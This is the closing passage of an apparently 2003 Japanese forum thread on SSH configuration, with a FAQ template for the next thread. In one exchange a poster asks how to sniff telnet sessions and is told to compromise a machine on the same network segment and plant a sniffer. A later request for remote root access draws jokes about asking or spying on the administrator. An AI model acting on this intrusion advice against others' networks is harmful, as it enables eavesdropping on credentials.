952 :名無しさん@お腹いっぱい。:03/06/21 19:49
>>951

> 進行遅そうだから>>980辺りまで待つ?
でいいんじゃないかなぁ。マターリ行こう

953 :948:03/06/21 20:24
みなさまどうもありがとうございます。

>>950
> SSHプロトコル2では dsa も rsa もユーザやリモートホストの
> 「認証」にしか使っていない。

これが分かっていなかったです。

> リモートホストの認証に使うアルゴリズム(= known_hosts ファイルに
> 書き込まれる公開鍵の種類)を選択したいのなら
> ssh_config の HostKeyAlgorithms を指定すればよし。

今回やりたかったことはこちらでした。
おかげさまで、
% slogin dst -o"HostKeyAlgorithms ssh-dss,ssh-rsa"
としてホスト dst に dsa でリモートホスト認証する (してもらう?)
ことができました。


954 :名無しさん@お腹いっぱい。:03/06/23 10:47
最近の openssh では AllowHosts/DenyHosts の設定ができないことに
今さらながら気がついたんですが、どうしてなんでしょうか。

まあ、--with-tcp-wrappers で configure すればいいんですけど。
……っていうか、それが理由?

955 :名無しさん@お腹いっぱい。:03/06/23 10:59
>>954
これ関連か?
http://www.securityfocus.com/bid/7831

956 :名無しさん@お腹いっぱい。:03/06/23 21:05
IP addressみたいな信用おけないものを認証にからめちゃいけないという
考えもあるシナー。

957 :名無しさん@お腹いっぱい。:03/06/25 14:49
>954
AllowUsers/DenyUsersでそれっぽくできることは知ってるよね

958 :名無しさん@XEmacs:03/06/26 12:40
>>957
> >954
> AllowUsers/DenyUsersでそれっぽくできることは知ってるよね

つーか、OpenSSH で AllowHosts/DenyHosts ができたことってあるの
か?



959 :JN-25:03/07/14 10:32
r系コマンドでログインしたマシンのセッションを、どうしたら平分で垂れ流された
通信内容を傍受することができますか。

960 :名無しさん@お腹いっぱい。:03/07/14 10:54
>>959
板違い。

961 :_:03/07/14 11:36
http://homepage.mac.com/hiroyuki44/

962 :JN-25:03/07/14 12:15
どうやって傍受するの

963 :名無しさん@お腹いっぱい。:03/07/14 12:43
ふつーにやればできる。

964 :JN-25:03/07/14 13:26

        user: hage
        Password:hoge        
マシンA------------telnet------------------>サーバ




マシンA------------ssh------------------>サーバ
jfirhufr987342jsdj983scnsahfy8
jfq98ur34jksd8q8udsu8dedandndj
hdsf98y349r8hsdsuhsofhfihhouhf

ですけど、どうやったらtelnetセッションを覗き見できるんですか。
自分としては、ただ単に世間一般で言われてるtelnetが如何に酷いか
知りたかっただけです。

965 :名無しさん@お腹いっぱい。:03/07/14 13:32
>>964
マシンAもしくはそれと同じセグメントにあるマシンを crack し
sniffer をしかける。

966 :JN-25:03/07/14 13:40
>>965
要するに外部から覗き見るならまず最初に、
マシンAに侵入して、そこからsniffer仕掛けるってことだよね?

967 :JN-25:03/07/14 13:42
てっきり、tcpdumpするのかと思ってた、、、

968 :名無しさん@お腹いっぱい。:03/07/14 13:49
>>966
A とバカハブで同じセグメントにつながってるマシンがあれば
そっちでもいい。

>>967
tcpdump は sniffer の一種。

969 :JN-25:03/07/14 13:53
どうもです。
今日試してみて見ます。

勿論、自分で作ったラボでね、、、

970 :JN-25:03/07/14 15:25
また変な質問して済まんが、UN*X系のOSで一番お勧めのオープンソースの
snifferっていったら大抵のエキスパートは何を使いますか。

私が思いつく以上、tcpdumpしか無いと思ってるのですが、、、

971 :名無しさん@お腹いっぱい。:03/07/14 15:36
>>970
くだらない質問はここに書き込め!なんでもアリ25
http://pc.2ch.net/test/read.cgi/unix/1055864733/

972 :名無しさん@お腹いっぱい。:03/07/14 15:41
トラフィック中から特定のデータをふるいだそうとしてるやつがさ、
どうしてSSHスレという特定のデータの場所に無関係なデータを
混ぜようとするのか不思議だ。

973 :名無しさん@お腹いっぱい。:03/07/14 20:58
厨とはそういう生き物

974 :名無しさん@お腹いっぱい。:03/07/14 21:54
遠隔地から、あるネットワークの根権限を取得したいのですが、どうやれば取得が可能でしょうか。

975 :名無しさん@お腹いっぱい。:03/07/14 22:11
>>974

1) 管理者に聞く
2) 管理者の背中越に覗き見る

が、一番手っ取り早いと思うにょ とりあえず(・∀・)ガンガレ!


976 :名無しさん@お腹いっぱい。:03/07/14 22:22
遠隔地からじゃイロジカケは無理かな。

977 :名無しさん@お腹いっぱい。:03/07/14 22:40
>>975
管理者に聞かず、尚且つ物理的に覗き見ることなく遠隔地の根権限を
獲得するにはどうしたら良いでしょうか。

そういう事は可能だと聞きました。
でも、学校では不可能と教えられました。

978 :名無しさん@お腹いっぱい。:03/07/14 22:46
>>977
> そういう事は可能だと聞きました。
> でも、学校では不可能と教えられました。
その通り。お前には不可能。

979 :名無しさん@お腹いっぱい。:03/07/14 23:01
>>978
分かってるのなら教えて下さいよ。やり方だけでも

980 :名無しさん@お腹いっぱい。:03/07/14 23:35
>>979
Matrix Reloadedでも見れ。

981 :名無しさん@お腹いっぱい。:03/07/14 23:44
>>979
>>975の「管理者に聞く」の意味を百万年考えろ。
それでもまだわからんかもしれんが。

982 :名無しさん@お腹いっぱい。:03/07/15 00:45
私が作った無料サイトだよ♪
私も出てるよ〜
http://angelers.free-city.net/page001.html

983 :名無しさん@お腹いっぱい。:03/07/15 00:59
980超えちゃったし、次スレ立てたほうがいいんでない?
それにしてもみんなやさしいなぁ。どれだけ邪険でも回答するんだから。

984 :950=980:03/07/15 01:06
>>983
> 980超えちゃったし、次スレ立てたほうがいいんでない?
ちょっと待ってちょ。
今、スレ立ての準備してます。

985 :950=980:03/07/15 01:40
うう、何度やってもスレ立てに失敗する…
どなたか代わりにおながいします。

以下テンプレ

---
SSH その3


SSHに関する情報交換のスレッドです。

FAQ、リンク集は >>2-5 あたり。

前スレ: http://pc.2ch.net/test/read.cgi/unix/1028157825/
前々スレ: http://pc.2ch.net/unix/kako/976/976497035.html

---
よくある質問

Q. 公開鍵認証などは使用せず、パスワードによる認証を行う場合でも
そのパスワードは暗号化されているのですか?
A. はい、その通りです。
SSHプロトコルでは、まず始めにサーバ<->クライアント間で
暗号化された通信路を確立します。
ユーザ認証はその暗号化通信路の上で行なわれるので、
パスワードなどもちゃんと秘匿されています。


986 :950=980:03/07/15 01:40
関連リンク集

本家SSH: http://www.ssh.com/
(日本語) http://www.ipsec.co.jp/
OpenSSH: http://www.openssh.com/ja/
OpenSSH情報: http://www.unixuser.org/~haruyama/security/openssh/
OpenSSHマニュアル: http://www.unixuser.org/~euske/doc/openssh/jman/
OpenSSH-HOWTO: http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/
(PuTTY日本語版): http://hp.vector.co.jp/authors/VA024651/
(PuTTYスレ): http://pc.2ch.net/test/read.cgi/unix/1014702733/l50
TTSSH: http://www.zip.com.au/~roca/ttssh.html
(TTSSH日本語版): http://www.sakurachan.org/soft/teraterm-j/ttssh/
MacSSH: http://www.macssh.com/
WideのSSH解説: http://www.soi.wide.ad.jp/class/20000009/slides/12/
IETF secsh protocol: http://www.ietf.org/html.charters/secsh-charter.html
PortForwarder: http://www.fuji-climb.org/pf/JP/
VNC on SSH: http://www.uk.research.att.com/vnc/sshvnc.html
Tramp: http://www.nongnu.org/tramp/tramp_ja.html
おまけ・Theoのキチガイぶり: http://pc.2ch.net/test/read.cgi/unix/1023635938/546-550


987 :名無しさん@お腹いっぱい。:03/07/15 02:03
SSH その3
http://pc.2ch.net/test/read.cgi/unix/1058202104/

立てたけど、しばらく立てないほうがよかったかもね。

988 :名無しさん@お腹いっぱい。:03/07/15 02:03
SSH その3
http://pc.2ch.net/test/read.cgi/unix/1058202104/


989 :名無しさん@お腹いっぱい。:03/07/15 02:13
あれは完全放置でいいだろ。

990 :山崎 渉:03/07/15 11:14

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

991 :950=980:03/07/15 13:29
>>987
スレ立て、ありがとうございます。

992 :名無しさん@お腹いっぱい。:03/07/15 14:42
埋め立て

993 :名無しさん@お腹いっぱい。:03/07/15 14:42
埋め立て2

994 :名無しさん@お腹いっぱい。:03/07/15 14:43
埋めたて注意

995 :名無しさん@お腹いっぱい。:03/07/15 14:43
埋め立てぬるぽ

996 :名無しさん@お腹いっぱい。:03/07/15 14:44
埋めた手

997 :名無しさん@お腹いっぱい。:03/07/15 14:45
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩  
  _/し' //. V`Д´)/   ←994
 (_フ彡        /


998 :名無しさん@お腹いっぱい。:03/07/15 14:46
埋め立てさいたま

999 :999:03/07/15 14:46
でも,埋め立て

1000 :ヒマ神:03/07/15 14:48
1000


1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

270 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)